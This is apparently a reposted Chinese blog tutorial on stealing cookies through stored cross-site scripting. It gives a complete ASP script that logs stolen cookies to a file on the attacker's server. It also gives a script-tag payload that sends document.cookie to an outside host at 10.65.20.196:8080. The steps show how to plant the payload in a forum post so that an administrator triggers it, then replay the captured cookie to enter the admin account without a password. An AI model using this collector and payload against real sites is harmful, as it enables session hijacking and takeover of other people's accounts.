zoukankan      html  css  js  c++  java
  • XSS获取cookie并利用

    获取cookie利用代码cookie.asp

    <html>

    <title>xx</title>

    <body>

    <%testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile

    msg = Request("msg") //获取提交过来的msg变量,也就是cookie

    set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象

    set thisfile = fs.OpenTextFile(testfile,8,True,0)

    thisfile.WriteLine(""&msg&"")//code.txt中写入获取来的cookie

    thisfile.close() //关闭

    set fs = nothing%>

    </body>

    </html>

    把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。

    XSS构造语句

    <script>window.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)</script>

    把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到http://10.65.20.196:8080/cookie.asp?msg='+document.cookie的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。

    简单步骤如下:

    1、在存在漏洞的论坛中发日志:

    2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:

    3、这是没有账户前的登陆界面:

    4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据:

    5、替换cookie后不用输用户名密码就顺利进入管理员账户了:

  • 相关阅读:
    Hive架构原理
    Hive与HBase的区别
    2019-11-14:命令执行漏洞防御,PHP反序列化漏洞产生原因,笔记
    2019-11-13:任意代码执行,基础学习, 笔记
    2019-11-12:文件包含基础学习,笔记
    2019-11-11:文件上传,文件包含基础,笔记
    普法贴
    2019-11-7:练习上传getshell,通过菜刀连接
    String中intern的方法
    在cmd里面使用mysql命令
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154622.html
Copyright © 2011-2022 走看看